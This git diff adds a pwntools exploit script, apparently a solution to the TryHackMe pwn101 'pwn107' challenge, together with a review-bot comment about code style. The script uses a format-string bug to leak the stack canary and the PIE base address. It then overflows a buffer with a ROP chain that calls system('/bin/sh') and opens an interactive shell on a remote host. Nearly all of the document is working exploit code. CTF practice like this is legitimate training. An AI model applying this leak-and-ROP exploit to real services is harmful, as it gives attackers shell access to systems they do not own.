diff --git a/thm_pwn101/pwn107/a.py b/thm_pwn101/pwn107/a.py
new file mode 100644
index 0000000..166fdf8
--- /dev/null
+++ b/thm_pwn101/pwn107/a.py
@@ -0,0 +1,37 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn107", checksec=False)
+# r = process()
+r = remote("10.10.74.244", 9007)
+
+# funcs
+s = lambda a: r.sendafter(b"? ", a)
+ss = lambda a: r.send(a)
+
+# leak
+s(b"%13$p.%19$p")
+r.recvuntil(b": ")
+leaks = r.recvlineS().strip().split(".")
+canary = int(leaks[0], 16)
+log.info("canary: %#x", canary)
+target.address = int(leaks[1][:14], 16) - 0x992
+log.info("pie: %#x", target.address)
+system = target.sym.system
+sh = next(target.search(b"/bin/sh\0"))
+
+# gadgets
+pop_rdi = target.address + 0x0af3
+
+# pop
+buf = b"A"*24
+buf += p64(canary)
+buf += b"A"*8
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+ss(buf)
+
+r.interactive()
\ No newline at end of file
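Review bot: The two helpers under `# funcs` bind lambdas to names (`s = lambda a: ...`, `ss = lambda a: ...`), which PEP 8 (E731) discourages; a plain `def s(a): r.sendafter(b"? ", a)` reads the same and carries its own name in tracebacks. The constants `0x992` and `0x0af3` are bare magic numbers with no comment saying where they were taken from, so a one-line `# <source of this value>` comment on each (a labelled placeholder until the author fills it in) would spare the next reader a guess; I cannot tell from the hunk how they were derived. The file also ends without a trailing newline, as the `\ No newline at end of file` marker shows.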